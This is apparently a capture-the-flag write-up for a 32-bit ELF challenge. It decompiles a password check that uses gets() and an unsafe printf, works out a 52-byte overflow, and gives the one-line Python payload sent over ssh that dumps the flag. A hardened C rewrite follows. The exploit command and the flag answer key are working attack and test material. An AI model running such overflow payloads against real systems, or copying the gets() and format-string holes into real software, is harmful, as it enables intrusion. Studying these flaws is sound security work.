We are given a binary and a key.
$ file e100.bin
e100.bin: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.24, BuildID[sha1]=4410355efef2e99ac54e4028dba1b3e40d055fee, stripped

Also loading in gdb-peda.
gdb-peda$ checksec
CANARY : ENABLED
FORTIFY : disabled
NX : ENABLED
PIE : disabled
RELRO : Partial

Good. Loading the binary in Hopper and decompiling.
function sub_80484fd {
    var_C = *0x14;
    printf("Enter password: ");
    gets(var_2C);
    if (arg0 == 0xbadb0169) {
        system("cat flag");
    }
    else {
        for (var_30 = 0x0; var_30 < strlen(var_2C); var_30 = var_30 + 0x1) {
            *(int8_t *)(var_30 + var_2C) = arg0 ^ *(int8_t *)(var_30 + var_2C) & 0xff;
        }
        printf("Your new secure password is: ");
        printf(var_2C);
    }
    eax = var_C ^ *0x14;
    COND = eax == 0x0;
    if (!COND) {
        eax = __stack_chk_fail();
    }
    return eax;
}

So we have a gets() into a stack buffer and a static hardcoded check on the function's argument. Basic buffer overflow!!
0x804851b: lea eax,[ebp-0x2c]
0x804851e: mov DWORD PTR [esp],eax
=> 0x8048521: call 0x80483a0 <gets@plt>
0x8048526: cmp DWORD PTR [ebp+0x8],0xbadb0169

The buffer starts at ebp-0x2c and the compared argument lives at ebp+0x8, so the padding is 0x2c + 0x8 = 52 bytes. Now the final blow.
$ python -c "print 'A'*52+'\xba\xdb\x01\x69'[::-1]" | ssh -i id_rsa_e100 dctf@10.13.37.6
Pseudo-terminal will not be allocated because stdin is not a terminal.
DCTF{3671bacdb5ea5bc26982df7da6de196e}
Enter password: *** stack smashing detected ***: /home/dctf/e100 terminated

The canary is only checked when the function returns, after system("cat flag") has already run, so the flag comes out before the abort.

Flag:
DCTF{3671bacdb5ea5bc26982df7da6de196e}
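As an added example that is not part of the original writeup or the challenge binary, here is the decompiled routine rewritten so the overflow above can no longer reach the argument or the canary: a bounded read replaces gets(), and the output no longer uses the buffer as its format string. The names read_password, transform_password, check_password and CHECK_VALUE are chosen here; CHECK_VALUE is the constant from the decompilation.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* The hardcoded check value from the decompilation. */
#define CHECK_VALUE 0xbadb0169u

/* Bounded replacement for gets(): copy input into buf up to the first
 * newline or NUL, never writing more than len-1 bytes, then NUL-terminate.
 * Returns the number of bytes stored. Excess bytes are dropped, so they
 * cannot reach the argument, saved registers or canary above the buffer. */
size_t read_password(const char *input, char *buf, size_t len)
{
    size_t n = 0;
    if (len == 0) return 0;
    while (n < len - 1 && input[n] != '\0' && input[n] != '\n') {
        buf[n] = input[n];
        n++;
    }
    buf[n] = '\0';
    return n;
}

/* XOR every byte of buf with the low byte of key, in place (the loop from
 * the decompiled function). strlen is taken once so a byte that XORs to
 * zero does not cut the loop short. Returns the number of bytes changed. */
size_t transform_password(char *buf, uint32_t key)
{
    size_t n = strlen(buf);
    for (size_t i = 0; i < n; i++)
        buf[i] = (char)((buf[i] ^ key) & 0xff);
    return n;
}

/* Hardened equivalent of sub_80484fd. Returns 1 when arg matches the check
 * value (where the original ran system("cat flag")), otherwise transforms
 * the password into buf and returns 0. Since read_password is bounded, arg
 * keeps whatever the caller passed, however long the input is. */
int check_password(const char *input, uint32_t arg, char *buf, size_t len)
{
    read_password(input, buf, len);
    if (arg == CHECK_VALUE)
        return 1;
    transform_password(buf, arg);
    /* The original passed buf itself as the format string; use "%s". */
    printf("Your new secure password is: %s\n", buf);
    return 0;
}
```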